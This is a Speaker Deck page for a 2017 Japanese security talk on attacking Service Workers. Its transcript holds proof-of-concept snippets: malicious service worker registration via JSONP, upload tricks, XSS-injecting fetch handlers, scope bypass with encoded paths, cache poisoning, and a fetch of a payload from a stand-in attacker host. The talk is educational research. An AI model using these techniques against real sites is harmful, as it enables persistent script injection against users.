Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Speaker Deck
PRO
Sign in
Sign up for free
攻撃者視点で見る Service Worker / PWA Study SW
Masato Kinugawa
September 14, 2017
Technology
20
23k
攻撃者視点で見る Service Worker / PWA Study SW
PWA Study(
https://web-study.connpass.com/event/65267/
) で発表した資料です。
Masato Kinugawa
September 14, 2017
Tweet
Share
More Decks by Masato Kinugawa
See All by Masato Kinugawa
JSでDoSる/ Shibuya.XSS techtalk #11
masatokinugawa
21
5.5k
Electron: Abusing the lack of context isolation - CureCon(en)
masatokinugawa
5
78k
Electron: Context Isolationの欠如を利用した任意コード実行 / Electron: Abusing the lack of context isolation - CureCon(ja)
masatokinugawa
9
16k
バグハンターが見てきたBug Bountyの7年 / LINE Developer Meetup #34 Security Bug Bounty
masatokinugawa
18
11k
5文字で書くJavaScript/ Shibuya.XSS techtalk #10
masatokinugawa
35
18k
ブラウザのUIのバグを探す / Secusoba PopUnder
masatokinugawa
2
1.5k
USAGE OF XSS FILTER
masatokinugawa
4
2.3k
XSSフィルターの使い方/ Shibuya.XSS techtalk #9
masatokinugawa
7
2.4k
XSS Attacks through PATH
masatokinugawa
8
16k
Other Decks in Technology
See All in Technology
開発者のための GitHub Organization の安全な運用と 継続的なモニタリング
flatt_security
3
3.8k
[SRE NEXT 2022]KaaS桶狭間の戦い 〜Yahoo! JAPANのSLI/SLOを用いた統合監視〜
srenext
0
350
Spotify物理コントローラーがほしい
miso
0
170
次期LTSに備えよ!AOS 6.1 HCI Core 編
smzksts
0
180
ITエンジニアを取り巻く環境とキャリアパス / A career path for Japanese IT engineers
takatama
0
600
ニフティでSRE推進活動を始めて取り組んできたこと
niftycorp
2
510
Who owns the Service Level?
chaspy
5
1.1k
Oracle Content Management サービス概要 (2022年5月版)
oracle4engineer
PRO
0
120
Unity Package Managerで自作パッケージを配布する方法
yunoda
0
200
信頼性の階層の一段目を積み上げる/Monitoring Dashboard
shonansurvivors
0
180
testing journey / テストが嫌いでIT業界を離れるはずだったのに〜テスト嫌いが現場で品質改善を実施するまでの物語〜
aki_moon
1
370
CAMのサービス開発の歴史と共通基盤を使った 開発スタイルへの変遷について
ishikawa_pro
0
100
Featured
See All Featured
Infographics Made Easy
chrislema
233
17k
Bootstrapping a Software Product
garrettdimon
295
110k
Large-scale JavaScript Application Architecture
addyosmani
499
110k
Put a Button on it: Removing Barriers to Going Fast.
kastner
56
2.3k
Web Components: a chance to create the future
zenorocha
303
40k
Designing the Hi-DPI Web
ddemaree
272
32k
Web development in the modern age
philhawksworth
197
9.3k
Designing with Data
zakiwarfel
91
3.9k
The Straight Up "How To Draw Better" Workshop
denniskardys
225
120k
Rails Girls Zürich Keynote
gr2m
86
12k
Code Reviewing Like a Champion
maltzj
506
37k
The Language of Interfaces
destraynor
148
20k
Transcript
None
None
• •
• • • <script> navigator.serviceWorker.register("/sw.js") </script>
• • •
• • https://html5experts.jp/kyo_ago/5153/ https://speakerdeck.com/filedescriptor/exploiting-the-unexploitable-with-lesser-known-browser-tricks?slide=23
None
HTTP/1.1 200 OK Content-Type: text/javascript; charset=UTF-8 [...] alert(1)//({});
<script> navigator.serviceWorker.register("/jsonp?callback=[SW_HERE]//"); </script> HTTP/1.1 200 OK Content-Type: text/javascript; charset=UTF-8 [...]
onfetch=event=>console.log('fetch')//({});
<script> var formData = new FormData(); formData.append("csrf_token", "secret"); var sw
= "/* [SW_CODE] */"; var blob = new Blob([sw], { type: "text/javascript"}); formData.append("file", blob, "sw.js"); fetch("/upload", {method: "POST", body: formData}) .then(/* Register SW */); </script>
• •
• • onfetch=e=>{ body = '<script>alert(1)</script>'; init = {headers: {'content-type':
'text/html'}}; e.respondWith(new Response(body,init)); }
• • • <script> navigator.serviceWorker.register("/sw.js", {scope: "/"}) </script>
• • "/assets/js/sw.js", {scope: "https://other.example.com/"} "/assets/js/sw.js", {scope: "/assets/"} "/assets/js/sw.js", {scope:
"/assets/css/"} "/assets/js/sw.js", {scope: "/assets/js/"} "/assets/js/sw.js", {scope: "/assets/js/sub/"}
HTTP/1.1 200 OK content-type: text/javascript service-worker-allowed: / [...]
https://example.com/api/jsonp https://example.com/api%2Fjsonp
❝ ❞
https://example.com/out-of-scope/ https://example.com/foo/..%2Fout-of-scope%2F
None
• • •
onfetch=e=>{ e.respondWith(fetch("//attacker/poc.swf")) } •
<?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="example.jp" /> </cross-domain-policy> https://github.com/cure53/XSSChallengeWiki/wiki/XSSMas-Challenge-2016
❝ ❞
<script src="//example.com/socialbutton.js"></script>
self.addEventListener('install', e => { e.registerForeignFetch({ scopes: ['/'], origins: ['*']// });
}); onforeignfetch = e => { e.respondWith(fetch(e.request).then(res => ({ response: new Response('alert(1)')// }))) }
• •
onfetch = event => { event.respondWith( caches.open("v1").then(function(cache) { return cache.match(event.request).then(function(response)
{ if (response) { return response;// } else { return fetch(event.request.clone()).then(function(response) { cache.put(event.request, response.clone());// return response; }); } }) }) ); };
<script> caches.open("v1").then(function(cache){ content = "<script>alert(1)</script>"; init = {headers: {"content-type": "text/html"}};
request = new Request("poison.html"); response = new Response(content, init); cache.put(request, response); }) </script>
<script> document.write(localStorage.getItem('name')); </script>
• • •
• • HTTP/1.1 200 OK Content-Type:text/html Clear-Site-Data: "storage"
GET https://example.com/sw.js HTTP/1.1 Host: example.com Connection: keep-alive Pragma: no-cache Cache-Control:
no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: */* Service-Worker: script Referer: https://example.com/ Accept-Encoding: gzip, deflate, br Accept-Language: ja,en;q=0.8,en-US;q=0.6
• •
None
None